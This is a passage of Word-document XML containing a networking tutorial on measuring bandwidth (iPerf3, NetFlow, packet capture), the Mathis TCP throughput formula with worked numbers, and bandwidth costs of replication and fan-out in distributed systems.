    <w:p w14:paraId="073E72C2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="31D951A6">
          <v:rect id="_x0000_i4473" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C520AC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bandwidth Measurement — How It's Actually Measured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02830FB3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active vs Passive Measurement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FDF5C2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active measurement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Intentionally send test traffic to measure bandwidth. Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9F900" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>iPerf3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The standard tool for measuring network throughput between two endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C624BFD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A24B1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Server: iperf3 -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E76D7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Client: iperf3 -c &lt;server_ip&gt; -t 30 -P 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2391D619" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="2CCF3534" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>-t 30: run for 30 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438E79B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>-P 4: use 4 parallel TCP streams (to stress-test the path and measure aggregate bandwidth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619E560" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="1A8152F8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E58A552" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>[SUM]   0.00-30.00  sec  3.37 GBytes  940 Mbps    (near-perfect 1Gbps link utilization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB2197" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Speedtest.net / fast.com:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Consumer-facing bandwidth measurement. Uses multiple connections to/from geographically distributed servers to measure throughput from the client's last-mile connection to the internet backbone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D47FC9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The multi-stream necessity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A single TCP stream on a high-bandwidth-high-latency path often cannot saturate the link (cwnd limitation). Multiple parallel streams aggregate their cwnd, collectively utilizing more bandwidth. iPerf3's -P 4 flag uses 4 parallel streams — needed to accurately measure available bandwidth on paths where a single stream is cwnd-limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53372B5E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passive measurement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Monitor actual traffic without injecting test traffic. Captures real-world utilization including all protocol overhead and competing flows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06879DD4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Interface counters (SNMP, ifconfig, ip -s link):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Cumulative byte and packet counts per interface. Bandwidth = (bytes_now - bytes_previous) / interval. Available on every network device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBE77FA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>NetFlow/IPFIX:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Routers and switches export flow records — summaries of all flows (src/dst IP/port, protocol, byte count, packet count, start/end time). Enables per-flow bandwidth analysis: "which specific flows are consuming the most bandwidth?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750D80DE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Packet capture (tcpdump, Wireshark):</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Capture every packet, reconstruct exact timing. Full fidelity but extremely data-intensive — at 10Gbps, full packet capture requires 1.25 GB/s of storage. Used for forensic analysis of specific connections, not ongoing monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215B6B1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The TCP Throughput Formula</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E6976" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Mathis et al. (1997) derived a formula for maximum TCP throughput under steady-state loss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F0A071" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67480150" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Throughput ≤ (MSS / RTT) × (1 / √p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50675A57" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="2801943F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>MSS = maximum segment size (bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA10A27" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">RTT = round-trip time (seconds)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F6F22" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>p = packet loss rate (fraction, not percentage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B273396" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="19F2B8DE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Example: MSS=1460 bytes, RTT=50ms, p=0.01% (0.0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAAD90B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Throughput ≤ (1460 / 0.05) × (1 / √0.0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28553DE9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">           = 29,200 × (1 / 0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934CEFC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">           = 29,200 × 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F5945B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">           = 2,920,000 bytes/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4935BC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">           = ~23.4 Mbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F3C80" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="53E0ADC0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This means: on a 1Gbps link with 50ms RTT and 0.01% packet loss,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7681E1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP is theoretically limited to 23.4 Mbps — 2.3% of available bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76617A7D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Packet loss is absolutely devastating to TCP throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A50107" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The packet loss sensitivity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> 0.01% packet loss sounds negligible — 1 packet in 10,000. But as the formula shows, it limits a 1Gbps link to 23Mbps. 0.1% loss limits it to ~7.4Mbps. TCP's AIMD response to loss — cutting cwnd in half — is extremely aggressive, and recovery is slow (linear growth = many RTTs to rebuild cwnd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19252783" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why network reliability is more important than raw bandwidth for TCP performance.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A perfectly reliable 100Mbps link outperforms a lossy 1Gbps link for TCP workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41698862" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="791E1143">
          <v:rect id="_x0000_i4474" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A1EF7F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Bandwidth in Distributed Systems — The Architectural Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476D9116" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Network as a Distributed System Bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5163CA70" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>In distributed systems, bandwidth is not just a link property — it is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>system architecture constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> that determines what designs are feasible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5A1588" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The data locality principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9035C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Moving computation to data is cheaper than moving data to computation. This is why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02AB20" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>MapReduce runs mappers on the same machines that store HDFS data blocks — processing happens where data lives, minimizing network transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BC823" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Database indexes reduce query bandwidth — instead of scanning 100GB of table data over the network, fetch the 10MB index plus the 100KB of matched rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E9B491" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1194"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>CDN edge computing (Cloudflare Workers, Lambda@Edge) executes code at the edge — generating responses locally rather than fetching them from origin across the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0EDF4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The bandwidth cost of replication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7563DD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Every replication in a distributed database consumes bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84CDEF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD0997" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Database write workload: 10,000 writes/second, 1KB average write size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C5AF70" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>= 10MB/s write throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE81D66" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="72BCB75B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>With replication factor 3 (3 copies of every write):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD30E13" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>= 30MB/s total replication bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CFDE05" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>= 240 Mbps replication traffic on the internal network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C854DF7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="010CE902" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Across 10 database shards, each with RF=3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675390E5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>= 2.4 Gbps replication bandwidth — significant internal network load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA909D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication bandwidth scales multiplicatively</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> with write throughput and replication factor. High-write workloads with high replication factors can saturate internal network bandwidth before saturating disk IOPS — the bandwidth bottleneck precedes the storage bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA99CC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fan-Out and Bandwidth Amplification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAFAE1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Distributed query patterns that fan out to many backends create </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bandwidth amplification</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — one incoming request generates N outgoing requests to backends, each returning data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767666D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scatter-gather queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D13186" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2865B7ED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Client sends: GET /user/123/dashboard (1 request, ~1KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614DB532" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="7D2D1E8B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>API Gateway fans out to 5 services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9C377" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  GET /users/123 → 5KB response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC8791" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  GET /orders?user_id=123 → 50KB response (many orders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F79AFA0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  GET /recommendations/123 → 20KB response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5360F9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  GET /notifications/123 → 10KB response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBBEDC0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  GET /analytics/123 → 100KB response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439CA88E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="6BFB2633" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total inbound bandwidth to API gateway: 185KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF571D5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Aggregated response to client: 50KB (after filtering/summarizing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1CC33C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="5D7A99E1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Bandwidth amplification factor: 185× (one 1KB request generates 185KB of internal traffic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E38B6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>At 10,000 requests/second: 1KB × 10,000 = 10MB/s inbound, 185KB × 10,000 = 1.85GB/s internal bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76826E23" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fan-out bandwidth calculation is critical for capacity planning</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> — the bandwidth requirement is not proportional to external traffic, but to external traffic × fan-out factor × average response size per backend.</w:t>
      </w:r>
    </w:p>
